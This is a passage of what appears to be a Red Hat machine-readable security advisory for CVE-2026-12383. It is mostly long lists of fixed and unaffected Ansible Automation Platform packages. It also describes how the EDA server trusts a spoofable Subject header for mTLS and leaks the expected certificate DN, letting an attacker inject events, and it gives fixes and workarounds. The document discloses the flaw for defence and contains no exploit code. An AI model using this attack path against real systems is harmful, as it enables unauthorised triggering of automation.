"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2489127"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Event-Driven Ansible (EDA) server. The ExternalEventStreamViewSet uses permissive access controls (permission_classes=[AllowAny], authentication_classes=[]) and relies solely on the Subject HTTP header value for mTLS authentication without verifying that the header originated from a trusted proxy. Additionally, the expected certificate Distinguished Name is leaked in the 403 error response body. An attacker who can reach the EDA API endpoint with a spoofed Subject header can inject arbitrary events into mTLS-protected event streams, triggering downstream automation actions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "eda-server: ExternalEventStreamViewSet trusts Subject header without validation and leaks expected DN",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is a defense-in-depth failure in EDA that becomes exploitable when combined with the gateway header-forwarding issue (tracked as a separate CVE). EDA should not rely solely on an HTTP header for mTLS authentication. The DN leak in the error response further reduces the difficulty of exploitation. EDA has been included in AAP since version 2.4. The mTLS external event stream feature and the trust-of-Subject-header pattern apply to all EDA versions that support external event streams with mTLS authentication.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-12383"
},
{
"category": "external",
"summary": "RHBZ#2489127",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489127"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-12383",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-12383"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-12383",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12383"
}
],
"release_date": "2026-07-27T19:04:53.794000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "The following practices would help for avoiding exposure and mitigate this flaw:\n\n- Ensure the EDA server is not directly accessible from untrusted networks; all traffic should route through the AAP Gateway which should perform mTLS validation.\n- If possible, configure network-level access controls to restrict which source IPs can reach the EDA backend API.\n- Monitor EDA event streams for unexpected events_received counter changes.\n- Review and rotate mTLS client certificates if unauthorized access is suspected, as the expected DN may have been leaked via the 403 error response.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
